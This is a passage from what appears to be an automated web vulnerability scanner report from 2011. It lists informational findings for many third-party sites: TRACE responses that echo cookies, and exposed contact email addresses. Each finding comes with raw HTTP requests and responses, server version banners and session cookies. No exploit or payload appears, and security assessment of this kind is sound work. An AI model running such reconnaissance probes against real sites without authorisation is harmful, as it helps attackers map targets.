Cookie: 7e1b91a709434027

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:39:58 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.nextadvisor.com
Cookie: 7e1b91a709434027

26.31. http://www.nutter.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutter.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.nutter.com
Cookie: df7918803e2c613b

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:14:46 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: df7918803e2c613b
Host: www.nutter.com

26.32. http://www.sapha.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapha.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.sapha.com
Cookie: aacf7064846f084b

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:05:37 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.sapha.com
Cookie: aacf7064846f084b

26.33. http://www.skichalets.co.uk/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skichalets.co.uk
Path:   /

Request

TRACE / HTTP/1.0
Host: www.skichalets.co.uk
Cookie: 86f73662915b4a27

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 18:57:19 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.skichalets.co.uk
Cookie: 86f73662915b4a27

27. Email addresses disclosed  previous  next
There are 78 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

27.1. http://ads1.msn.com/library/dap.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads1.msn.com
Path:   /library/dap.js

Issue detail

The following email address was disclosed in the response:

Request

GET /library/dap.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads1.msn.com

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:57:49 GMT
Expires: Sun, 08 May 2011 19:41:30 GMT
Last-Modified: Tue, 15 Mar 2011 19:10:43 GMT
Cache-Control: max-age=172800
Content-Type: application/x-javascript
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l comment "RSACi North America Server" by "inet@microsoft.com" r (n 0 s 0 v 0 l 0))
X-Powered-By: ASP.NET
Vary: Accept-Encoding
X-WR-MODIFICATION: Content-Length
Content-Length: 13786


var _daprr=new Array('http://rad.msn.com/ADSAdClient31.dll?GetSAd=','http://a.rad.msn.com/ADSAdClient31.dll?GetSAd=', 'http://b.rad.msn.com/ADSAdClient31.dll?GetSAd=');var _daprs=0;var _daplp='http:/
...[SNIP]...
27.2. http://allatsea.net/directclassifieds.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://allatsea.net
Path:   /directclassifieds.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /directclassifieds.php?menuCategories=8 HTTP/1.1
Host: allatsea.net
Proxy-Connection: keep-alive
Referer: http://allatsea.net/subscribe.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=168508913.1304734000.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1797107816-1304734004419; __utma=168508913.126629396.1304734000.1304734000.1304734000.1; __utmc=168508913; __utmb=168508913.5.10.1304734000

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:13:31 GMT
Server: Apache/2.0.52 (CentOS)
X-Powered-By: PHP/4.3.9
Connection: close
Content-Type: text/html
Content-Length: 19526

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="mailto:advertising@allatsea.net">advertising@allatsea.net</a>
...[SNIP]...
<div align="left">- Mercury/Mercruiser Certified Technician required full time in Antigua. At least 5 years experience email us today paradise@candw.ag</div>
...[SNIP]...
27.3. http://allatsea.net/subscribe.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://allatsea.net
Path:   /subscribe.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /subscribe.htm HTTP/1.1
Host: allatsea.net
Proxy-Connection: keep-alive
Referer: http://allatsea.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=168508913.1304734000.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1797107816-1304734004419; __utma=168508913.126629396.1304734000.1304734000.1304734000.1; __utmc=168508913; __utmb=168508913.4.10.1304734000

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:12:31 GMT
Server: Apache/2.0.52 (CentOS)
Last-Modified: Mon, 11 Apr 2011 02:45:48 GMT
ETag: "7880d72-59bd-92ac8f00"
Accept-Ranges: bytes
Content-Length: 22973
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="mailto:subscribe@allatsea.net">subscribe@allatsea.net</a>
...[SNIP]...
27.4. https://broker.gotoassist.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://broker.gotoassist.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
Host: broker.gotoassist.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dtsSession=SessionInfo%3D237918117%253A6229CD39A2E2A4C

Response

HTTP/1.1 404 Not Found
Date: Sat, 07 May 2011 01:21:51 GMT
Server: Apache
Content-Length: 329
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico was not found on this server.</p>
<hr>
<
...[SNIP]...
<a href="mailto:webmaster@citrixonline.com">
...[SNIP]...
27.5. https://events.gsmiweb.com/subscribe.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://events.gsmiweb.com
Path:   /subscribe.php

Issue detail

The following email address was disclosed in the response:

Request

GET /subscribe.php?event_id=82 HTTP/1.1
Host: events.gsmiweb.com
Connection: keep-alive
Referer: https://events.gsmiweb.com/events.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=246713051.1303999551.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246713051.480784472.1303999551.1303999551.1303999551.1; PHPSESSID=n1ninf9mvtgucavvk20tlpt8n1

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:39:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 40247


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link rel="stylesheet" href="css/default.advanced.css" type="te
...[SNIP]...
<br>

               By e-mail: info@gsmiweb.com<br>
...[SNIP]...
27.6. http://freeconferencing.liveoffice.com/conferenceonline/scripts/putclicktocall.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://freeconferencing.liveoffice.com
Path:   /conferenceonline/scripts/putclicktocall.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /conferenceonline/scripts/putclicktocall.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: freeconferencing.liveoffice.com

Response

HTTP/1.1 404 Not Found
Content-Length: 6909
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:28:57 GMT

<html>
<head>
<title>Conference Calling: Toll Free Teleconferencing for Conference Calls by LiveOffice Conferencing</title>
<meta name="description" content="LiveOffice Teleconferencing | Reliable
...[SNIP]...
<a href="mailto:freeconferencing@liveoffice.com">freeconferencing@thebasementventures.com</a>
...[SNIP]...
27.7. http://hmficweb.hinghammutual.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hmficweb.hinghammutual.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Referer: http://hmficweb.hinghammutual.com/billing_view/billingview.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hmficweb.hinghammutual.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:35:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=okh4joycosvncyichzumbi3a; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17204

<xml id='AgencyCityXML'><Locations><Location STATE="CT" CITY="Avon" /><Location STATE="CT" CITY="Berlin" /><Location STATE="CT" CITY="Bethel" /><Location STATE="CT" CITY="Bolton" /><Location STATE="CT
...[SNIP]...
<a href="mailto:info@hinghammutual.com">info@hinghammutual.com</a>
...[SNIP]...
27.8. http://hmficweb.hinghammutual.com/abouthingham/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hmficweb.hinghammutual.com
Path:   /abouthingham/

Issue detail

The following email address was disclosed in the response:

Request

GET /abouthingham/ HTTP/1.1
Referer: http://hmficweb.hinghammutual.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hmficweb.hinghammutual.com
Cookie: ASPSESSIONIDSQCDDDAA=HPHJKIBCNPBPFKFPCLEPAMCN; ASP.NET_SessionId=kvicvmmhrzmxk4i3unxfj445
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:36:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4428


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html><!-- InstanceBegin template="/Templates/aboutHingham.dwt" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- Inst
...[SNIP]...
<a href="mailto:info@hinghammutual.com">info@hinghammutual.com</a>
...[SNIP]...
27.9. http://hmficweb.hinghammutual.com/abouthingham/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hmficweb.hinghammutual.com
Path:   /abouthingham/Default.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /abouthingham/Default.aspx HTTP/1.1
Referer: http://hmficweb.hinghammutual.com/abouthingham/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hmficweb.hinghammutual.com
Cookie: ASPSESSIONIDSQCDDDAA=HPHJKIBCNPBPFKFPCLEPAMCN; ASP.NET_SessionId=kvicvmmhrzmxk4i3unxfj445
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:37:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4428


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html><!-- InstanceBegin template="/Templates/aboutHingham.dwt" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- Inst
...[SNIP]...
<a href="mailto:info@hinghammutual.com">info@hinghammutual.com</a>
...[SNIP]...
27.10. http://hmficweb.hinghammutual.com/abouthingham/directorsandofficers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hmficweb.hinghammutual.com
Path:   /abouthingham/directorsandofficers/

Issue detail

The following email address was disclosed in the response:

Request

GET /abouthingham/directorsandofficers/ HTTP/1.1
Referer: http://hmficweb.hinghammutual.com/abouthingham/directorsandofficers
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hmficweb.hinghammutual.com
Cookie: ASPSESSIONIDSQCDDDAA=HPHJKIBCNPBPFKFPCLEPAMCN; ASP.NET_SessionId=kvicvmmhrzmxk4i3unxfj445
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:47:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6305


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html><!-- InstanceBegin template="/Templates/aboutHingham.dwt" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- Inst
...[SNIP]...
<a href="mailto:info@hinghammutual.com">info@hinghammutual.com</a>
...[SNIP]...
27.11. http://hmficweb.hinghammutual.com/abouthingham/history/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hmficweb.hinghammutual.com
Path:   /abouthingham/history/

Issue detail

The following email address was disclosed in the response:

Request

GET /abouthingham/history/ HTTP/1.1
Referer: http://hmficweb.hinghammutual.com/abouthingham/history
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hmficweb.hinghammutual.com
Cookie: ASPSESSIONIDSQCDDDAA=HPHJKIBCNPBPFKFPCLEPAMCN; ASP.NET_SessionId=kvicvmmhrzmxk4i3unxfj445
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:47:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6745


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html><!-- InstanceBegin template="/Templates/aboutHingham.dwt" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBegi
...[SNIP]...
<a href="mailto:info@hinghammutual.com">info@hinghammutual.com</a>
...[SNIP]...
27.12. http://hmficweb.hinghammutual.com/agencylocator/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hmficweb.hinghammutual.com
Path:   /agencylocator/

Issue detail

The following email address was disclosed in the response:

Request

GET /agencylocator/ HTTP/1.1
Referer: http://hmficweb.hinghammutual.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hmficweb.hinghammutual.com
Cookie: ASPSESSIONIDSQCDDDAA=HPHJKIBCNPBPFKFPCLEPAMCN; ASP.NET_SessionId=kvicvmmhrzmxk4i3unxfj445
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:36:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14191

<xml id='AgencyCityXML'><Locations><Location STATE="CT" CITY="Avon" /><Location STATE="CT" CITY="Berlin" /><Location STATE="CT" CITY="Bethel" /><Location STATE="CT" CITY="Bolton" /><Location STATE="CT
...[SNIP]...
<a href="mailto:info@hinghammutual.com">info@hinghammutual.com</a>
...[SNIP]...
27.13. http://hmficweb.hinghammutual.com/agents/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hmficweb.hinghammutual.com
Path:   /agents/

Issue detail

The following email address was disclosed in the response:

Request

GET /agents/ HTTP/1.1
Referer: http://hmficweb.hinghammutual.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hmficweb.hinghammutual.com
Cookie: ASPSESSIONIDSQCDDDAA=HPHJKIBCNPBPFKFPCLEPAMCN; ASP.NET_SessionId=kvicvmmhrzmxk4i3unxfj445
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:36:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4760


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html><!-- InstanceBegin template="/Templates/agents.dwt" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBe
...[SNIP]...
<a href="mailto:info@hinghammutual.com">info@hinghammutual.com</a>
...[SNIP]...
27.14. http://hmficweb.hinghammutual.com/billing/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hmficweb.hinghammutual.com
Path:   /billing/

Issue detail

The following email address was disclosed in the response:

Request

GET /billing/ HTTP/1.1
Referer: http://hmficweb.hinghammutual.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hmficweb.hinghammutual.com
Cookie: ASPSESSIONIDSQCDDDAA=HPHJKIBCNPBPFKFPCLEPAMCN; ASP.NET_SessionId=kvicvmmhrzmxk4i3unxfj445
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:36:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8810


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html><!-- InstanceBegin template="/Templates/billing.dwt" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceB
...[SNIP]...
<a href="mailto:info@hinghammutual.com">info@hinghammutual.com</a>
...[SNIP]...
27.15. http://hmficweb.hinghammutual.com/claims/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hmficweb.hinghammutual.com
Path:   /claims/

Issue detail

The following email address was disclosed in the response:

Request

GET /claims/ HTTP/1.1
Referer: http://hmficweb.hinghammutual.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hmficweb.hinghammutual.com
Cookie: ASPSESSIONIDSQCDDDAA=HPHJKIBCNPBPFKFPCLEPAMCN; ASP.NET_SessionId=kvicvmmhrzmxk4i3unxfj445
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:36:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 5020


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html><!-- InstanceBegin template="/Templates/claims.dwt" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBe
...[SNIP]...
<a href="mailto:info@hinghammutual.com">info@hinghammutual.com</a>
...[SNIP]...
27.16. http://hmficweb.hinghammutual.com/contactus/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hmficweb.hinghammutual.com
Path:   /contactus/

Issue detail

The following email address was disclosed in the response:

Request

GET /contactus/ HTTP/1.1
Referer: http://hmficweb.hinghammutual.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hmficweb.hinghammutual.com
Cookie: ASPSESSIONIDSQCDDDAA=HPHJKIBCNPBPFKFPCLEPAMCN; ASP.NET_SessionId=kvicvmmhrzmxk4i3unxfj445
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:36:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14546


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>Hingham Mutual</title>
       <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
       <meta name=
...[SNIP]...
<a href="mailto:info@hinghammutual.com">
...[SNIP]...
<a href="mailto:info@hinghammutual.com">info@hinghammutual.com</a>
...[SNIP]...
27.17. http://hmficweb.hinghammutual.com/contactus/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hmficweb.hinghammutual.com
Path:   /contactus/Default.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /contactus/Default.aspx HTTP/1.1
Referer: http://hmficweb.hinghammutual.com/contactus/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hmficweb.hinghammutual.com
Cookie: ASPSESSIONIDSQCDDDAA=HPHJKIBCNPBPFKFPCLEPAMCN; ASP.NET_SessionId=kvicvmmhrzmxk4i3unxfj445
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:37:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14546


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>Hingham Mutual</title>
       <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
       <meta name=
...[SNIP]...
<a href="mailto:info@hinghammutual.com">
...[SNIP]...
<a href="mailto:info@hinghammutual.com">info@hinghammutual.com</a>
...[SNIP]...
27.18. http://hmficweb.hinghammutual.com/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hmficweb.hinghammutual.com
Path:   /default.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /default.aspx HTTP/1.1
Referer: http://hmficweb.hinghammutual.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hmficweb.hinghammutual.com
Cookie: ASPSESSIONIDSQCDDDAA=HPHJKIBCNPBPFKFPCLEPAMCN; ASP.NET_SessionId=kvicvmmhrzmxk4i3unxfj445
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:36:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17204

<xml id='AgencyCityXML'><Locations><Location STATE="CT" CITY="Avon" /><Location STATE="CT" CITY="Berlin" /><Location STATE="CT" CITY="Bethel" /><Location STATE="CT" CITY="Bolton" /><Location STATE="CT
...[SNIP]...
<a href="mailto:info@hinghammutual.com">info@hinghammutual.com</a>
...[SNIP]...
27.19. http://hmficweb.hinghammutual.com/privacy/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hmficweb.hinghammutual.com
Path:   /privacy/

Issue detail

The following email address was disclosed in the response:

Request

GET /privacy/ HTTP/1.1
Referer: http://hmficweb.hinghammutual.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hmficweb.hinghammutual.com
Cookie: ASPSESSIONIDSQCDDDAA=HPHJKIBCNPBPFKFPCLEPAMCN; ASP.NET_SessionId=kvicvmmhrzmxk4i3unxfj445
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:36:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 5876


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html><!-- InstanceBegin template="/Templates/privacy.dwt" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceB
...[SNIP]...
<a href="mailto:info@hinghammutual.com">info@hinghammutual.com</a>
...[SNIP]...
27.20. http://hmficweb.hinghammutual.com/privacy/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hmficweb.hinghammutual.com
Path:   /privacy/Default.aspx

Issue detail

The following email address was disclosed in the response:

Request

POST /privacy/Default.aspx HTTP/1.1
Referer: http://hmficweb.hinghammutual.com/privacy/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: hmficweb.hinghammutual.com
Cookie: ASPSESSIONIDSQCDDDAA=HPHJKIBCNPBPFKFPCLEPAMCN; ASP.NET_SessionId=kvicvmmhrzmxk4i3unxfj445
Accept-Encoding: gzip, deflate
Content-Length: 68

__VIEWSTATE=%2fwEPDwULLTEzODIwMDg1MjRkZDdJuM8zFqd3hbtoqYKQAJtJAGm%2b

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:47:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 5876


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html><!-- InstanceBegin template="/Templates/privacy.dwt" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceB
...[SNIP]...
<a href="mailto:info@hinghammutual.com">info@hinghammutual.com</a>
...[SNIP]...
27.21. http://hmficweb.hinghammutual.com/products/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hmficweb.hinghammutual.com
Path:   /products/

Issue detail

The following email address was disclosed in the response:

Request

GET /products/ HTTP/1.1
Referer: http://hmficweb.hinghammutual.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hmficweb.hinghammutual.com
